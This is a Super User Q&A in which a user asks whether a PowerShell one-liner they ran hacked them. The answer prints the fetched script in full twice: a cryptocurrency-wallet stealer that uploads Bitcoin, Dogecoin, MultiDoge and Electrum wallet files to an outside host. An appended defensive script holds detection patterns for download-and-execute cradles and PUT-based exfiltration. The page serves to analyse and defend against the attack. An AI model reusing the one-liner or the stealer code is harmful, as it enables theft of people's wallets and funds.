https://superuser.com/questions/1682702/ran-a-powershell-script-was-i-hacked

Super User: Ran a PowerShell script, was I hacked?

Asked 21 hours ago, active today, viewed 3k times. Score: 19. Tags: powershell

Question (asked by Don):

I was an idiot and was suckered into running a PowerShell script. Can anyone tell me details about it? I have a feeling they only uploaded some files from my system. But I am worried there may be a backdoor left running on my system. The upload I can live with, but not a backdoor.

WARNING: do NOT run this script.

```
iex "& { $(irm
(I separated this into two lines to prevent unintentionally running it)
powershell.software/versioncheck) } RunJob"
```

WARNING: do NOT run this script.

Please help, I don't know where else to turn.

Comments on the question:

* Do you mean this one: social.technet.microsoft.com/Forums/en-US/... ??? - ChanganAuto, 21 hours ago

Answer (by pigeonburger, score 31, answered 21 hours ago, edited 16 hours ago):

WARNING: DO NOT EXECUTE ANY OF THE CODE IN THIS ANSWER. IT IS MALICIOUS AND HAS ONLY BEEN INCLUDED FOR DEMONSTRATIVE PURPOSES.

powershell.software/versioncheck is a malicious link. The page it leads to looks as follows:

```powershell
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
```

When you try to visit this link in a browser, it quickly redirects you away from that page to another page pretending (poorly) that the site does not exist. When executed in the full command you provided, however, it recognises the following lines as PowerShell commands:

```powershell
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
```

It is a primitive cryptocurrency wallet stealer. Every line starting with Invoke-RestMethod attempts to send data from other possible cryptocurrency wallets (if you have any installed on your computer) to a page on the endpoint http://extract.onl. If you have any cryptocurrency wallets on the computer, they are now likely compromised. Transfer anything in them to another SECURED wallet.

Summarizing your concerns:

> I have a feeling they only uploaded some files from my system. But I am worried there may be a backdoor left running on my system. The upload I can live with, but not a backdoor.

Yes, if these files on your computer existed, they were uploaded. That's all that this script appears to do, however, so there is no persisting backdoor left on your system.

Comments on the answer (8 comments, 5 shown):

* Thank you SO MUCH! You saved me days of work wiping my PC and reinstalling from scratch. - Don, 20 hours ago (score 5)
* No problem :) I hope you didn't lose anything of value. - pigeonburger, 17 hours ago (score 3)
* Both domains have NameCheap as a registrar. I sent them an abuse report about them and included a link to this question. - Rocket Hazmat, 6 hours ago (score 10)
* @Don I don't see any in the provided script; my point was that the script displayed was not uploaded by you as the one you ran. The website may have returned a different script for pigeonburger than it did for you. - Jason Goemaat, 5 hours ago (score 8)
* I uploaded a few TBs of /dev/urandom to the server - hope the creator is fine (smiles wickedly). - iBug, 3 hours ago (score 15)
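A defender's triage check for the two patterns this thread turns on, added here as an example; it is not part of the question or of pigeonburger's answer. The asker's one-liner is a "download cradle" (the output of irm/Invoke-RestMethod fed straight into iex/Invoke-Expression), and the fetched script exfiltrates files with Invoke-RestMethod -Method PUT -InFile. The script below looks for both in two local sources an incident responder already has: PSReadLine console history (assumed at its default path) and PowerShell ScriptBlock logging (Event ID 4104, which must already be enabled). The hostnames and paths in the sample input are constructed placeholders, and nothing here contacts the network.

```powershell
# Added example (not from the original question or answer): triage a Windows host
# for the download-and-execute cradle the asker ran and for the HTTP PUT file-upload
# pattern the fetched script used. Read-only; no network access.

# -match is case-insensitive, so cmdlet names and their aliases are matched as typed.
$CradlePattern = '\b(iex|Invoke-Expression)\b.*\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b'
$ExfilPattern  = 'Invoke-RestMethod\b.*-Method\s+PUT\b.*-InFile\b'

function Find-SuspiciousPowerShell {
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [string]$Source = 'unknown'
    )
    foreach ($line in $Lines) {
        $hits = @()
        if ($line -match $CradlePattern) { $hits += 'download-and-execute cradle' }
        if ($line -match $ExfilPattern)  { $hits += 'HTTP PUT file upload' }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Source    = $Source
                Indicator = $hits -join '; '
                Text      = $line.Trim()
            }
        }
    }
}

function Get-LocalPowerShellActivity {
    # PSReadLine history: every interactive command the user typed, including a
    # one-liner like the one in the question. This is PSReadLine's default path.
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    if (Test-Path $history) {
        Find-SuspiciousPowerShell -Lines (Get-Content $history) -Source 'PSReadLine history'
    }

    # ScriptBlock logging (Event ID 4104) records the content that was actually
    # executed on this machine, which matters when a server may have returned a
    # different script to this client than it shows to an analyst fetching it later.
    try {
        $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction Stop
        # Properties[2] of a 4104 event is ScriptBlockText.
        $blocks = $events | ForEach-Object { $_.Properties[2].Value }
        if ($blocks) {
            Find-SuspiciousPowerShell -Lines $blocks -Source 'ScriptBlock log 4104'
        }
    } catch {
        Write-Warning "ScriptBlock logging not available: $($_.Exception.Message)"
    }
}

# Constructed sample input so the matcher can be exercised offline. example.invalid
# is a reserved placeholder name, not a live indicator; only lines 2 and 3 should hit.
$Sample = @(
    'Get-ChildItem ~\Documents',
    'iex "& { $(irm example.invalid/versioncheck) } RunJob"',
    'Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Example\wallet.dat example.invalid/upload',
    'Invoke-RestMethod https://example.invalid/api/status'
)
Find-SuspiciousPowerShell -Lines $Sample -Source 'constructed sample' | Format-Table -AutoSize

# On the affected machine, run the real collection instead:
# Get-LocalPowerShellActivity | Format-Table -AutoSize
```

The 4104 log is the piece worth having before the next incident: it is the only one of the two sources that captures what the remote server actually returned, which addresses the point raised in the comments that the server may serve different content to different clients. Script block logging is off by default on most workstations and is enabled through the "Turn on PowerShell Script Block Logging" Group Policy setting (or the matching registry policy). The history file, by contrast, only shows the command that was typed, not what it fetched.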
site design / logo (c) 2021 Stack Exchange Inc; user contributions licensed under cc by-sa. rev 2021.10.20.40515